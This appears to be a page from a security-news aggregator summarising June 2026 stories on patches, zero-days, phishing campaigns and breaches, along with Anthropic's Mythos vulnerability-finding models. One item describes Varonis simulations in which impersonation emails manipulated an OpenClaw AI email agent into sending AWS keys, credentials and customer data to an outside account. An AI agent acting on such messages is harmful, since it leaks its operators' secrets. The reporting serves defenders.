This is the same underlying event: WhatsApp detecting renewed NSO-linked phishing targeting of its users despite an existing court order, adding an additional source noting the alleged violation and tying it to spyware activity.
Bill Toulas 2026.06.08 98%
This article reports the same underlying event: WhatsApp/Meta says it disrupted new NSO-linked one-click phishing activity targeting WhatsApp users, including test accounts and groups, and names the suspected infrastructure domains used in the campaign.
2026.06.08 99%
This article is a direct update on the same event: WhatsApp says NSO violated the court injunction by targeting users with spearphishing links and test accounts/groups, and that Meta is seeking a contempt order while sharing indicators of compromise.
Eduard Kovacs 2026.06.08 98%
This article is a direct report on the same event: WhatsApp says it detected and disrupted an NSO-linked spear-phishing campaign using malicious links, disabled related test accounts and groups, and is seeking a federal contempt order for violating the permanent injunction barring NSO from targeting WhatsApp users.
2026.06.08 100%
This article establishes a new trackable event: Meta's allegation of a fresh NSO-linked WhatsApp targeting campaign and its request that the court enforce the prior injunction through contempt proceedings.
Full page
Ivanti patches two critical Sentry flaws, including root remote-code-execution bug CVE-2026-10520
10H ago 3 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareIvanti
Ivanti released emergency security updates for its Sentry mobile gateway after finding two critical flaws that could let attackers take over affected systems. The bugs are CVE-2026-10520, a maximum-severity OS command injection issue that can enable remote code execution as root, and CVE-2026-10523, an authentication bypass that can let unauthenticated attackers create rogue admin accounts. Fixes are in Sentry versions R10.5.2, R10.6.2, and R10.7.1; Ivanti said it has no evidence of active exploitation at disclosure.
Why it matters: Organizations using Ivanti Sentry should update immediately because these bugs could hand an attacker full control of a gateway that sits between mobile devices and internal corporate systems. Even without confirmed in-the-wild abuse yet, Ivanti edge and management products have a strong history of rapid post-disclosure exploitation.
Sources
2026.06.10 99%
This article reports the same Ivanti Sentry disclosure, adding patch urgency, affected fixed versions (10.5.2, 10.6.2, 10.7.1), and technical detail from watchTowr that CVE-2026-10520 involved an exposed Apache Tomcat API parsing attacker-controlled MICS configuration commands; it also reiterates CVE-2026-10523 as an unauthenticated admin-account creation flaw.
Ionut Arghire 2026.06.10 94%
This article adds that Ivanti released Sentry 10.5.2, 10.6.2, and 10.7.1 to fix CVE-2026-10520 and CVE-2026-10523, and also notes related EPMM fixes (CVE-2026-6973 and CVE-2026-10727). It reiterates that CVE-2026-10520 is a remote unauthenticated OS command injection leading to root code execution and that CVE-2026-10523 is a remote unauthenticated authentication bypass allowing creation of administrator accounts, with Ivanti saying it has no evidence of active exploitation.
Sergiu Gatlan 2026.06.10 100%
This article establishes a new tracked event: Ivanti's June 2026 disclosure and patching of CVE-2026-10520 and CVE-2026-10523 in Sentry, distinct from prior Ivanti EPMM and other zero-day stories.
Full page
Microsoft issues mitigations for YellowKey Windows BitLocker bypass zero-day tracked as CVE-2026-45585
12H ago 10 sources
Urgent PatchesPolicy & RegulationZero-Days & CVEsSurveillance & PrivacyTechnology & SoftwareConsumers & General PublicMicrosoft
Microsoft said it is tracking the publicly disclosed YellowKey Windows BitLocker security feature bypass as CVE-2026-45585 and published mitigations pending a security update. The flaw can allow access to BitLocker-protected drives by abusing specially crafted FsTx files and WinRE behavior; Microsoft recommends disabling autofstx.exe auto-start in WinRE and requiring BitLocker TPM+PIN startup authentication.
Why it matters: Organizations and users relying on BitLocker for device-at-rest protection may need to apply mitigations immediately because PoC details are public and a fix is not yet available. Defenders should review BitLocker startup settings and WinRE configuration now.
Sources
Sergiu Gatlan 2026.06.10 94%
This article updates the same YellowKey event by reporting that Microsoft has now patched CVE-2026-45585 as part of June 2026 Patch Tuesday, moving the story from mitigations-only to an available fix.
BrianKrebs 2026.06.09 41%
The article references the same YellowKey/BitLocker disclosure thread and notes Microsoft's June patching of a related BitLocker elevation-of-privilege issue, though the main event here is Patch Tuesday rather than the original YellowKey mitigation story.
Lawrence Abrams 2026.06.09 52%
This article reports Microsoft’s June Patch Tuesday fix for a separate publicly disclosed Windows BitLocker bypass flaw, CVE-2026-50507, adding another BitLocker zero-day-related development but not the same underlying vulnerability as YellowKey CVE-2026-45585.
Eduard Kovacs 2026.06.03 41%
YellowKey is one of the Nightmare Eclipse-disclosed flaws discussed here. The article adds context that YellowKey was part of a broader batch of publicly dumped Microsoft zero-days that triggered controversy and partial patching, but the main event is the broader disclosure backlash rather than a standalone YellowKey update.
Bruce Schneier 2026.06.02 57%
The post explicitly references the BitLocker-breaking exploit from the Nightmare Eclipse disclosures, adding context that Microsoft is threatening the researcher tied to the YellowKey zero-day case.
2026.05.28 80%
This article adds Microsoft’s broader response to the Nightmare Eclipse zero-day disclosures, reiterates that YellowKey (CVE-2026-45585) remains unpatched, says Microsoft considers exploitation more likely, and places YellowKey alongside five other publicly dumped Windows flaws in the same disclosure campaign.
Ionut Arghire 2026.05.20 99%
This article is directly about the same YellowKey event and adds specifics on Microsoft's mitigation steps, the CVE assignment (CVE-2026-45585), the WinRE/autofstx.exe behavior being blocked, and debate over whether BitLocker+PIN is also affected.
info@thehackernews.com (The Hacker News) 2026.05.20 99%
The article appears to cover the same underlying event: Microsoft's release of mitigations for the YellowKey BitLocker bypass vulnerability CVE-2026-45585.
Sergiu Gatlan 2026.05.20 100%
This article establishes a distinct tracked event by adding Microsoft's official CVE assignment and mitigation guidance for the YellowKey BitLocker zero-day, which is not represented in the existing story list.
Bruce Schneier 2026.05.18 88%
This is an early report on the same YellowKey BitLocker bypass event, noting public disclosure by Nightmare-Eclipse and that the exploit reliably bypasses default Windows 11 BitLocker with physical access.
Full page
ServiceNow says attackers exploited an unauthenticated API flaw to access data in some customer instances
12H ago 3 sources
Zero-Days & CVEsBreaches & Data LeaksServiceNow
ServiceNow told affected customers that attackers accessed data from some hosted customer instances through a flaw in an API endpoint. The company said it applied a security update on June 5, 2026 to require authentication for the affected endpoint, reportedly /api/now/related_list_edit/create, after detecting anomalous activity. ServiceNow has not yet assigned a CVE, and says the issue mainly affects customers on the Australia release or older releases with certain configuration changes.
Why it matters: Organizations using affected ServiceNow instances may have exposed sensitive ticket, employee, asset, and incident-response data, including credentials or tokens pasted into support workflows. This is urgent for affected customers: review logs and exposed records immediately, check for requests to the vulnerable endpoint, and rotate any secrets that may have been accessible.
Sources
Eduard Kovacs 2026.06.10 98%
This is the same underlying event: ServiceNow patched the flaw in hosted instances on June 5, said exploitation allowed unauthenticated users in some cases to gain greater access and query instance tables, noted affected customers were notified, and added detail that Australia platform release users or customers with specific configuration changes were affected. It also reports the company is still evaluating a CVE assignment and that some reports claim ServiceNow had known of the issue since April 7.
info@thehackernews.com (The Hacker News) 2026.06.10 99%
This article covers the same underlying event: exploitation of a ServiceNow flaw to gain unauthorized access to customer instances, reinforcing the incident details and affected scope already tracked.
Lawrence Abrams 2026.06.09 100%
This article appears to be the first concrete reporting of the ServiceNow incident, including exploitation details, affected release scope, the likely endpoint, and operational guidance for defenders.
Full page
Fortinet patches critical FortiSandbox bug CVE-2026-25089 that lets attackers run code without logging in
13H ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareFortinet
Fortinet fixed a critical flaw in FortiSandbox that could let an attacker take over affected appliances over the internet without a password. The bug, CVE-2026-25089, is an OS command injection issue in the FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web interface, exploitable via crafted HTTP requests for arbitrary command execution. Fixes shipped in FortiSandbox 5.0.6 and 4.4.9, FortiSandbox Cloud 5.0.6, and FortiSandbox PaaS 5.0.6; Fortinet also patched two medium-severity flaws in FortiOS, FortiProxy, and FortiPortal.
Why it matters: Organizations using FortiSandbox should update quickly because this is the kind of bug that can allow full remote compromise of a security appliance. Even though Fortinet says it has no evidence of attacks yet, internet-facing management interfaces are high-risk and should be patched or tightly restricted immediately.
Sources
Ionut Arghire 2026.06.10 100%
The article establishes a distinct Fortinet patch event centered on CVE-2026-25089 in FortiSandbox, which is not the same underlying event as any existing tracked story.
Full page
Anthropic says it plans broader release of Mythos-class AI bug-finding models after expanding restricted access to governments
19H ago 10 sources
Policy & RegulationSurveillance & PrivacyZero-Days & CVEsGovernmentTechnology & SoftwareAnthropic
Anthropic says it intends to eventually make Mythos-class vulnerability-finding artificial intelligence available more broadly, but for now is expanding its restricted Project Glasswing program to additional partners including U.S. and allied governments. The company says Mythos has scanned more than 1,000 open-source projects, estimated 6,202 high-or-critical-severity vulnerabilities and 23,019 total flaws, and validated many findings through coordinated disclosure; no CVE list or release date for public access was provided.
Why it matters: This matters because a powerful AI system for finding software flaws could help defenders patch faster, but could also accelerate criminal discovery of exploitable bugs if released without effective guardrails. Security teams should expect faster vulnerability discovery pressure in widely used open-source components and be prepared for heavier disclosure and patching volume.
Sources
Mayank Parmar 2026.06.10 89%
This article advances the same underlying event by reporting Anthropic's public rollout of Fable 5, a guarded version of the Mythos-class model, and adds concrete details on access limits, sensitive-query downgrading to Opus 4.8, temporary availability to Pro/Max/Enterprise users, and the distinction between restricted Mythos 5 and safeguarded Fable 5.
Eduard Kovacs 2026.06.09 84%
This article is a direct follow-up on that same underlying event: Anthropic has now launched Claude Fable 5 for general availability with cyber/bio fallbacks and says Project Glasswing partners are being upgraded from Mythos Preview to Mythos 5, adding concrete rollout details, guardrail design, pricing, and partner-access changes.
Ionut Arghire 2026.06.09 93%
This is a direct follow-up on the same Mythos program, adding concrete exploit-generation results: Anthropic says Mythos Preview produced working Firefox and Windows N-day exploits within hours, showing the model can weaponize disclosed flaws rather than only find bugs.
2026.06.03 86%
This article adds specific details on Anthropic's Project Glasswing expansion from about 50 to 200 partners across 15 countries, identifies new access dynamics affecting UK banks, and notes that ENISA will receive Mythos Preview access while CISA has not yet been selected.
2026.06.02 88%
This article directly updates the same Mythos / Project Glasswing event by adding that Anthropic expanded the preview program by about 150 organizations to roughly 200 total partners, and that Cisco used Mythos Preview and OpenAI's GPT 5.5-Cyber to scan 1.8 billion lines of Cisco code in eight weeks with a reported false-positive rate under 3 percent, though Cisco did not disclose the number of flaws found or fixed.
Eduard Kovacs 2026.06.02 96%
This is a direct update on the same underlying event: Anthropic broadening Mythos availability. The new reporting adds that Project Glasswing is expanding from about 50 to roughly 200 total partner organizations, that the new cohort includes critical-infrastructure entities and reportedly Okta, Samsung, ENISA, and NATO, and that Anthropic says Mythos has found more than 23,000 potential vulnerabilities with only 75 high/critical issues patched so far.
Mayank Parmar 2026.05.29 95%
This article directly updates the same underlying event by reporting Anthropic's confirmation that Mythos-class models are expected to roll out to all customers in the coming weeks, adding timing and reaffirming that prior restrictions were due to security risk concerns.
Mayank Parmar 2026.05.25 93%
This article adds specific evidence that Anthropic may be moving from restricted access toward product integration, citing Mythos references and a briefly exposed toggle in public Claude Code and Claude Security, plus new details on the Glasswing program and Anthropic's claim that Mythos found 10,000 high- or critical-severity vulnerabilities in its first month.
Eduard Kovacs 2026.05.25 91%
This is a direct update on the same underlying Mythos/Project Glasswing rollout, adding Anthropic's first large-scale outcome data: 23,000 potential flaws across 1,000+ open source projects, 1,726 externally confirmed findings, more than 1,000 high- or critical-severity issues, 75 severe issues already patched, and 65 advisories published.
2026.05.25 100%
This article establishes a new trackable development around Anthropic’s Mythos program by adding a concrete policy shift toward wider access, naming government expansion, and quantifying validated open-source vulnerability discovery at scale.
Full page
UK scales back planned telecom cybersecurity rules introduced after Salt Typhoon espionage campaign
23H ago 1 sources
Policy & RegulationThreat Actors & APTsTelecommunicationsGovernment
The UK has weakened proposed telecom security requirements that were drafted after the China-linked Salt Typhoon spying campaign against telecom networks. Recorded Future News reports the government dropped or delayed several measures after industry objections, including a proposed independent signalling intrusion detection system meant to detect abuse of telecom signalling traffic. The updated code takes effect in mid-July unless Parliament blocks it, and operators can still be judged against it under existing telecom security duties.
Why it matters: This affects how well UK phone and internet providers may detect and contain state-backed intrusions into core communications networks. Telecom operators, regulators, and enterprise customers should review the final code now because the changes may leave weaker safeguards against the kinds of access used for large-scale espionage.
Sources
2026.06.09 100%
The article establishes a distinct UK policy story: the government’s rollback of telecom security measures specifically developed in response to Salt Typhoon-style telecom espionage.
Full page
HTTP/2 Bomb denial-of-service attack chain hits default NGINX, Apache, IIS, Envoy and Pingora web server setups
23H ago 5 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareNGINXApacheMicrosoftEnvoyCloudflare
Researchers say a new HTTP/2 attack chain can knock major web servers offline within seconds, potentially affecting more than 880,000 websites using default configurations. The technique combines an HPACK header-compression bomb with Slowloris-style connection holding to exhaust memory; it builds on CVE-2016-6581, CVE-2016-8740, CVE-2016-1546, Apache's 2025 fix CVE-2025-53020, and newly assigned Apache CVE-2026-49975. NGINX reportedly fixed the issue in April, Apache in late May, while Microsoft IIS, Envoy, and Cloudflare Pingora had not yet been patched at publication.
Why it matters: Organizations running internet-facing HTTP/2 servers could be taken offline by a relatively low-resource attacker, so this is operationally urgent even though it is a denial-of-service issue rather than data theft. Admins should review vendor advisories, apply available fixes for NGINX and Apache, and add mitigations or rate-limiting for IIS, Envoy, and Pingora until patches arrive.
Sources
2026.06.09 63%
It ties Microsoft's June patch release to the previously disclosed HTTP/2 Bomb research by stating that Microsoft fixed CVE-2026-49160 in HTTP.sys and introduced a MaxHeadersCount registry mitigation for HTTP/2 and HTTP/3 requests.
Lawrence Abrams 2026.06.09 93%
This directly updates the HTTP/2 Bomb story by confirming Microsoft patched the related Windows HTTP.sys denial-of-service issue as CVE-2026-49160 and added a MaxHeadersCount mitigation setting and KB5102602 guidance.
2026.06.04 98%
This article is another report on the same HTTP/2 Bomb attack chain, adding details that OpenAI Codex helped Calif researchers chain older HPACK bomb and Slowloris-style techniques, and updating patch status for nginx, Apache, Envoy, Microsoft IIS, and Cloudflare Pingora.
Bill Toulas 2026.06.03 98%
This article is a direct report on the same HTTP/2 Bomb event, adding concrete exploitation results, affected versions, patch status, and the Apache CVE assignment (CVE-2026-49975), plus noting that nginx 1.29.8 fixes the issue while IIS, Envoy, and Pingora remain unpatched.
Ionut Arghire 2026.06.03 100%
This article appears to be the first report establishing the newly named HTTP/2 Bomb exploit chain, including affected products, CVE references, patch status, and public proof-of-concept details.
Full page
Public zero-day in VS Code and github.dev can steal GitHub tokens and expose private repositories
23H ago 6 sources
Zero-Days & CVEsUrgent PatchesSupply ChainTechnology & SoftwareMicrosoftGitHub
A newly disclosed Visual Studio Code flaw can let attackers steal a victim’s GitHub sign-in token with a single click on a malicious link, potentially exposing all private repositories that account can access. Researcher Ammar Askar published proof-of-concept exploit code on June 3, 2026; no CVE has been assigned and no official patch is available. The bug abuses message passing between sandboxed webviews and the main editor in github.dev, allowing a malicious extension to be installed and extract a broad GitHub OAuth token.
Why it matters: Developers, maintainers, and employees who use github.dev or VS Code-linked GitHub workflows could have source code and other private repository data exposed before a fix is available. Until Microsoft and GitHub ship a patch, users should treat github.dev links cautiously and clear github.dev cookies/site data so unexpected extension sign-in prompts appear.
Sources
BrianKrebs 2026.06.09 53%
Krebs notes Microsoft also patched a zero-day in Visual Studio Code that can steal GitHub tokens, which appears to be the same underlying VS Code/github.dev token-theft flaw tracked separately.
2026.06.04 95%
This article is a direct update on that same VS Code/github.dev token-theft zero-day, adding that researcher Ammar Askar publicly released a working exploit, said he bypassed Microsoft’s reporting process, and that GitHub received about one hour’s notice before disclosure while Microsoft has not clarified crediting, CVE assignment, or exposure scope.
Eduard Kovacs 2026.06.04 99%
This article covers the same underlying event: Ammar Askar’s public disclosure of a one-click VS Code/github.dev zero-day that steals GitHub tokens via a malicious Jupyter notebook and extension install. It adds that Microsoft patched github.dev on June 3, notes the desktop VS Code path appears to remain unpatched, and reiterates the remote-code-execution risk on desktop.
2026.06.03 97%
This article is a direct report on the same underlying event: Ammar Askar's public disclosure of a VS Code/github.dev flaw that abuses Workspace Recommendations and a Jupyter Notebook Webview trick to auto-install a malicious extension and steal GitHub OAuth tokens. It adds detail on the disclosure timeline, Askar's decision to publish within an hour of notifying a GitHub contact, and his stated dispute with MSRC over prior VS Code vulnerability handling.
info@thehackernews.com (The Hacker News) 2026.06.03 96%
The article appears to cover the same underlying event: a one-click attack in GitHub Dev/github.dev related to VS Code that can steal full GitHub OAuth tokens and expose private repositories.
Sergiu Gatlan 2026.06.03 100%
This article appears to be the first major report establishing a distinct public zero-day affecting VS Code/github.dev, with exploit code and immediate defender action needed.
Full page
Varonis finds OpenClaw AI email agent can be phished into sending AWS keys, database credentials, and customer data
1D ago 1 sources
Social Engineering & PhishingSurveillance & PrivacyTechnology & SoftwareOpenClawGoogleOpenAIAmazon Web Services
Researchers found that an OpenClaw AI email agent could be tricked by phishing-style messages into leaking sensitive data instead of protecting it. In Varonis simulations, the open-source agent, connected to Gmail, browser tools, and Google Workspace APIs, sent AWS IAM keys, database credentials, SSH details, and CRM exports to an external account after urgent impersonation emails. The tests used Google Gemini 3.1 Pro and OpenAI GPT-5.4 and showed that URL and OAuth-app checks were stronger than sender-identity verification.
Why it matters: Organizations testing AI agents for email and workflow automation could accidentally give them access to data they can be manipulated into disclosing. Treat this as an immediate design and policy issue: limit agent privileges, block unapproved external sharing, require human approval for high-risk actions, and verify sender identity before deployment.
Sources
Bill Toulas 2026.06.09 100%
This article establishes a distinct security story about phishing and impersonation attacks against OpenClaw-based AI agents causing sensitive-data exposure in realistic enterprise workflows.
Full page
SAP fixes critical NetWeaver and Commerce flaws including NetWeaver SAML bug CVE-2026-44748
1D ago 2 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareRetail & E-CommerceSAP
SAP released June 2026 security updates for critical flaws in NetWeaver, Commerce Cloud, and Data Hub that could let attackers access sensitive data, crash systems, or bypass normal protections. The most severe issues are CVE-2026-44748, an XML Signature Wrapping flaw in NetWeaver AS ABAP and ABAP Platform SAML authentication rated 9.9; CVE-2026-27671, a 9.8 memory-corruption bug in the SAP kernel's RFC handling affecting NetWeaver and ABAP Platform; CVE-2026-22732, a 9.1 Spring Security header-handling issue affecting Commerce Cloud and Data Hub; and CVE-2026-40128, a 9.0 directory traversal flaw in NetWeaver Application Server Java reachable through crafted HTTP logon requests.
Why it matters: SAP systems often sit at the core of large companies' business operations, so critical flaws in NetWeaver and Commerce can have broad operational and data-security impact. Organizations using affected SAP products should review SAP's June 2026 notes, apply patches promptly, and use temporary mitigations such as disabling SAML where needed until updates are installed.
Sources
Bill Toulas 2026.06.09 98%
This article is the same June 2026 SAP patch event and adds details on the full set of 15 fixes, highlighting four critical flaws including CVE-2026-44748 in NetWeaver, CVE-2026-27671 in ABAP, CVE-2026-22732 affecting Commerce Cloud and Data Hub, and CVE-2026-40128 in NetWeaver AS Java, plus two high-severity issues.
Ionut Arghire 2026.06.09 100%
This article establishes a new tracked story around SAP's June 2026 Patch Day release and the specific critical CVEs affecting NetWeaver, Commerce Cloud, and Data Hub.
Full page
Adobe patches 123 security flaws across Experience Manager, ColdFusion, Acrobat, Campaign Classic and other products
1D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicAdobe
Adobe released security updates fixing 123 vulnerabilities across 11 products, affecting organizations and users running Experience Manager, ColdFusion, Acrobat Reader and other Adobe software. The biggest group is 57 flaws in Adobe Experience Manager, while ColdFusion and Campaign Classic include the highest-priority issues, with two Campaign Classic remote-code-execution bugs rated CVSS 10. Adobe said it has no evidence of in-the-wild exploitation and did not list CVE IDs in this report, but marked the ColdFusion and Campaign Classic issues as priority 1, meaning exploitation is more likely.
Why it matters: Organizations using Adobe server products should review and apply these updates promptly, especially for ColdFusion and Campaign Classic, because remote-code-execution bugs can let attackers take over systems. End users should update Acrobat and Reader through normal patch channels.
Sources
Eduard Kovacs 2026.06.09 100%
This article establishes a distinct June 2026 Adobe patch cycle story covering a large set of vulnerabilities across multiple Adobe products, with especially important fixes in ColdFusion and Campaign Classic.
Full page
New Jersey police accused of assaulting journalists and denying press protections during Delaney Hall protest coverage
1D ago 2 sources
Surveillance & PrivacyInformation FreedomGovernmentMedia & EntertainmentConsumers & General PublicNew Jersey policeDelaney Hall
Press-freedom groups say federal and local law enforcement assaulted at least 40 journalists covering protests and a detainee hunger strike near the Delaney Hall immigration detention facility in Newark, New Jersey. The Freedom of the Press Foundation says New Jersey police appeared to decide on the spot who counted as a journalist and who did not, raising concerns about unlawful interference with newsgathering and First Amendment protections during protest reporting.
Why it matters: This matters to the public because it can limit independent reporting on police activity and protests, making it harder to know what is happening on the ground. Journalists, legal observers, and civil-liberties groups should watch for further incidents, preserve evidence, and track whether authorities change policy or face legal challenges.
Sources
Caitlin Vogus 2026.06.09 77%
This article adds specific reporting that journalists covering the Delaney Hall protests in Newark said police turned them away for carrying gas masks or bags needed to hold protective equipment, tying PPE restrictions directly to the same protest-policing environment already tracked in the Delaney Hall press-freedom story.
Freedom of the Press Foundation 2026.06.05 100%
This article establishes a distinct press-freedom story centered on alleged police assaults on reporters and ad hoc credentialing decisions during coverage of protests at Delaney Hall in Newark.
Full page
OpenSSL patches high-severity PKCS#7 verification flaw CVE-2026-45447 and 17 other vulnerabilities
1D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareOpenSSL
OpenSSL released new versions to fix a high-severity bug that can crash applications and may allow remote code execution when they verify a specially crafted signed message. The main issue, CVE-2026-45447, is a heap use-after-free in PKCS7_verify() triggered by a malformed PKCS#7 or S/MIME SignedData digestAlgorithms field; OpenSSL also patched 17 other flaws ranging from low to moderate severity affecting certificate handling, encryption integrity, denial of service, and possible code execution paths.
Why it matters: OpenSSL is embedded in many servers, appliances, and applications, so this can affect far more systems than organizations realize. Teams should identify where OpenSSL is deployed and apply the new releases promptly, especially in products or services that process S/MIME or PKCS#7 signed content.
Sources
Eduard Kovacs 2026.06.09 100%
This article appears to be the first item here establishing the OpenSSL June 2026 patch event centered on CVE-2026-45447 and the broader batch of 18 fixed vulnerabilities.
Full page
Veeam patches critical Backup & Replication flaw CVE-2026-44963 that lets domain users run code on backup servers
1D ago 2 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareVeeam
Veeam released fixes for a critical flaw in its Backup & Replication software that could let a low-privilege domain user take over a backup server. The issue, CVE-2026-44963, affects Veeam Backup & Replication 12.3.2.4465 and all earlier version 12 builds when the backup server is joined to a Windows domain; it was fixed in version 12.3.2.4854, and Veeam says version 13.x is not affected due to architectural changes.
Why it matters: Backup servers are high-value targets because attackers and ransomware gangs use them to steal data and destroy recovery options. Organizations running affected Veeam versions should update immediately and review whether backup servers are unnecessarily joined to a domain.
Sources
info@thehackernews.com (The Hacker News) 2026.06.09 99%
This article appears to report the same Veeam Backup & Replication remote-code-execution issue, centered on CVE-2026-44963 and its impact on domain-joined environments, adding another source covering the same vendor patch and risk details.
Sergiu Gatlan 2026.06.09 100%
This article establishes a new story around Veeam's disclosure and patching of CVE-2026-44963, a newly reported critical RCE flaw affecting domain-joined Veeam Backup & Replication servers.
Full page
SiribClone uses fake romance and aid lures on Telegram to spy on Russian soldiers with SafeLoveStealer and SiribGrabber malware
1D ago 1 sources
Threat Actors & APTsMalwareSocial Engineering & PhishingDefense & AerospaceTechnology & SoftwareConsumers & General PublicTelegram
Hackers posing as women seeking relationships or volunteers offering help tricked Russian military personnel into installing spyware or surrendering their Telegram accounts. Researchers at F6 say the previously undocumented SiribClone group has operated since at least summer 2025, targeting troops in border regions and combat zones with Android spyware dubbed SafeLoveStealer, desktop malware called SiribGrabber, and phishing sites masquerading as Telegram logins, invite pages, medical portals, and other services to steal messages, files, location data, and microphone audio.
Why it matters: This is an active espionage campaign aimed at people in combat zones and shows how romance lures and fake support offers can turn personal chats into battlefield surveillance. Anyone in sensitive roles should treat unsolicited Telegram contacts, app downloads, and login pages as high risk, avoid sideloading apps, and use phishing-resistant account protections where possible.
Sources
2026.06.09 100%
The article is the first concrete report here tying the SiribClone operation to specific lures, malware families, and Telegram account theft tactics against Russian military targets.
Full page
Group-IB links thousands of fake FIFA World Cup 2026 domains to fraud campaigns targeting ticket buyers
1D ago 4 sources
Social Engineering & PhishingScams & FraudMalwareMedia & EntertainmentHospitality & TravelConsumers & General PublicFIFAFBI
Researchers say multiple criminal groups have built fake FIFA websites to steal World Cup fans’ passwords, payment details, and money through bogus ticket sales. Group-IB identified four separate campaigns since August 2025, including a Chinese-speaking operation it calls GHOST STADIUM that uses more than 300 active lookalike domains and roughly 3,800 dormant ones. The phishing kit closely copies FIFA’s login flow, can trigger password-reset steps to lock victims out, and is being promoted through Facebook ads offering unrealistically cheap tickets.
Why it matters: Fans trying to buy 2026 World Cup tickets could lose their accounts, have legitimate tickets resold, or pay scammers for fake seats. Users should only type fifa.com directly into their browser, avoid ad-linked ticket offers, and treat lookalike FIFA domains as suspicious.
Sources
Arctic Wolf Labs 2026.06.09 84%
This is the same underlying World Cup 2026-themed fraud and phishing ecosystem, but adds materially new details: more than 10,000 themed domains since January 2026, a mobile-first funnel through WhatsApp/Telegram/Discord, a real-time adversary-in-the-middle phishing kit that defeats one-time MFA codes, a Windows infostealer delivered via ticket lures, and targeting of host-city staff and fake FIFA career portals aimed at Google Workspace accounts.
SecurityWeek News 2026.05.29 98%
This source reiterates Group-IB's findings on thousands of fraudulent FIFA-themed domains and adds detail that a Chinese-speaking group dubbed Ghost Stadium ran more than 300 domains, including a near-perfect clone of FIFA's site.
Bill Toulas 2026.05.28 95%
This article covers the same underlying World Cup 2026 fraud campaign ecosystem and adds an FBI public warning, example lookalike domains, fraud types beyond ticketing, and references to Group-IB's Ghost Stadium cluster and Bitdefender observations across multiple countries and ad channels.
2026.05.28 100%
This article establishes a distinct, named fraud operation and broader cluster of World Cup-themed phishing and ticket scams, with concrete infrastructure, tactics, and estimated victim impact.
Full page
UK orders Apple, Google and other device makers to add controls that block nude images for children
1D ago 2 sources
Policy & RegulationSurveillance & PrivacyGovernmentTechnology & SoftwareConsumers & General PublicAppleGoogleUK Home OfficeSignal
The UK government says Apple, Google and other tech companies have three months to enable device-level controls on smartphones and tablets that detect and block nude images for children. The Home Office says the controls must work across apps and services by default and only be disabled through age assurance, with possible legislation, fines, and potential executive liability if companies do not comply. Officials also say adults would need age verification to access nude content on devices.
Why it matters: This is a major security-and-privacy policy development because it pushes on-device content scanning and age checks beyond individual apps into phones and tablets themselves. Device makers, app platforms, privacy advocates, parents, and UK users may all be affected, and companies now face a short deadline to respond or prepare for regulation.
Sources
2026.06.09 95%
This is a direct follow-up on the same UK child-safety device-scanning initiative, adding Signal's response that on-device scanning and age-verification requirements would weaken privacy, threaten encrypted messaging, and create infrastructure that could be repurposed for censorship and state surveillance.
2026.06.08 100%
This article appears to be the first concrete report here on the UK government's three-month demand for device-level nude-image blocking and age-assurance controls on smartphones and tablets.
Full page
French government says Tchap messaging service was breached through a hijacked user account
1D ago 2 sources
Surveillance & PrivacyBreaches & Data LeaksSocial Engineering & PhishingGovernmentEducationTchapDINUMANSSI
France's government says an attacker got into Tchap, the encrypted messaging service used by public-sector workers, by taking over a valid user account. DINUM said ANSSI detected the intrusion on June 8 and blocked the compromised account, while investigators review logs to determine what conversations and data were accessed or stolen. A threat actor claimed the access came from social engineering on an education-related Tchap shard and alleged theft of 13.5GB of files, roughly 650,000 messages, and data on more than 73,000 accounts, plus a flaw allowing shared media files to be downloaded without a token.
Why it matters: This affects a government communications platform with more than 300,000 monthly users, so exposed chats, files, and account metadata could have broad public-sector impact. French agencies and users should treat the incident as potentially sensitive, review what was shared in public rooms, investigate account takeover paths, and reset or harden credentials where appropriate.
Sources
2026.06.09 98%
This article appears to cover the same Tchap incident and adds details that ANSSI detected suspicious activity on June 7, DINUM says only public chat rooms were exposed, CNIL was notified, and the alleged attacker claims much broader access including tens of thousands of accounts, hundreds of thousands of messages, and possible exposure via directory search.
Sergiu Gatlan 2026.06.09 100%
This article establishes a new tracked story by identifying a specific intrusion into France's Tchap government messaging platform, including the access method, affected service, and preliminary scope of potentially exposed data.
Full page
Check Point patches exploited VPN authentication-bypass zero-day CVE-2026-50751 tied to Qilin ransomware activity
1D ago 4 sources
Urgent PatchesRansomwareZero-Days & CVEsGovernmentTechnology & SoftwareCheck PointCISA
Check Point says attackers used a zero-day flaw to break into some of its VPN systems, and at least one confirmed follow-on intrusion was linked to the Qilin ransomware operation. The main issue, CVE-2026-50751, is an unauthenticated authentication-bypass bug affecting Remote Access VPN, Mobile Access / SSL VPN, and Spark gateways when configured with deprecated IKEv1, legacy clients, and no mandatory machine certificate; Check Point also disclosed CVE-2026-50752, an IKEv1 certificate-validation flaw that could enable man-in-the-middle attacks on site-to-site VPNs. Exploitation began May 7 and has hit a few dozen organizations globally.
Why it matters: Organizations using affected Check Point VPN setups could be exposed to break-ins without valid credentials, with ransomware risk if attackers get in. This is urgent: apply Check Point's updates immediately or disable IKEv1, require machine certificates, and follow the vendor's mitigations.
Sources
Ionut Arghire 2026.06.09 99%
This article is a direct report on the same underlying event, adding specifics that exploitation began on May 7, affected a few dozen targeted organizations globally, involved deprecated IKEv1 certificate-validation logic, and that CISA added CVE-2026-50751 to KEV with a June 11 federal patch deadline; it also notes a second flaw, CVE-2026-50752, enabling site-to-site VPN man-in-the-middle attacks but not observed exploited.
Sergiu Gatlan 2026.06.09 96%
This article is a direct update on the same CVE-2026-50751 zero-day, adding that CISA placed it in the KEV catalog and ordered U.S. federal agencies to patch by June 11 under BOD 22-01, while reiterating exploitation details and mitigations for affected Check Point Remote Access VPN, Mobile Access, and Spark deployments using IKEv1.
2026.06.08 98%
This article is a direct update on the same Check Point VPN zero-day event, adding that exploitation began as early as May 7, that attackers had about a month-long head start before the fix, that several dozen organizations were targeted globally, and that Check Point also disclosed a related second flaw, CVE-2026-50752, affecting IKEv1 site-to-site VPN certificate validation.
Sergiu Gatlan 2026.06.08 100%
This article establishes a new tracked event centered on Check Point's disclosure and patching of CVE-2026-50751 as an exploited zero-day, plus the attribution of at least one post-compromise case to a Qilin ransomware affiliate.
Full page
Another NHS trust says the Qilin attack on Synnovis exposed patient records two years after the breach
1D ago 1 sources
